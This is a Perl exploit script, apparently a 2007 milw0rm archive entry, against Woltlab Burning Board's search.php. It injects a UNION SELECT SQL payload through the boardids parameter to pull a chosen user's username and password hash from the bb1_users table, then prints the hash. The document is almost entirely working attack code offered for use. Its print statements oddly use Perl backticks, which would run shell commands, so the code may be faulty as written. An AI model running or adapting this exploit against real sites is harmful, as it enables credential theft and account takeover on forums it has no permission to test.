Woltlab Burning Board <= 1.0.2, 2.3.6 search.php SQL Injection Exploit 3#!/usr/bin/perl
use LWP::UserAgent;
use HTTP::Response;

$| = 1;
print `
###################################################
##
## Woltlab Burning Board 2.3.6 <= / Lite Exploit 
##
###################################################
##
## Coded by 666 <http://blueshisha.mutebox.net>
## Bug by trew
##
###################################################
\n`;

if($#ARGV < 0)
{
        print `[x] Usage: wbbsploit.pl [Target] [Userid] [Searchstring]\n`;
        exit;
}
print `<~> Exploiting...\n`;
my $url = shift;
my $id = shift;
my $sstring = shift;

my $ua = LWP::UserAgent->new;
my $request = new HTTP::Request('POST', 'http://'.$url.'search.php');
$request->content('searchuser=&amp;name_exactly=1&amp;topiconly=0&amp;showposts=0&amp;searchdate=0&amp;beforeafter=after&amp;sortby=lastpost&amp;sortorder=desc&amp;send=send&amp;sid=&amp;submit=Suchen&amp;boardids%5B%5D=1)%20UNION%20SELECT%20username,password%20FROM%20bb1_users%20WHERE%20userid='.$id.'/*&amp;searchstring='.$sstring.'');
$request->content_type('application/x-www-form-urlencoded');
my $response = $ua->request($request);
my $body     = $response->content;
print `<~> Hash: `;
$body=~/([a-f0-9]{32})/;
print $1;
print `\n`;

# milw0rm.com [2007-01-17]
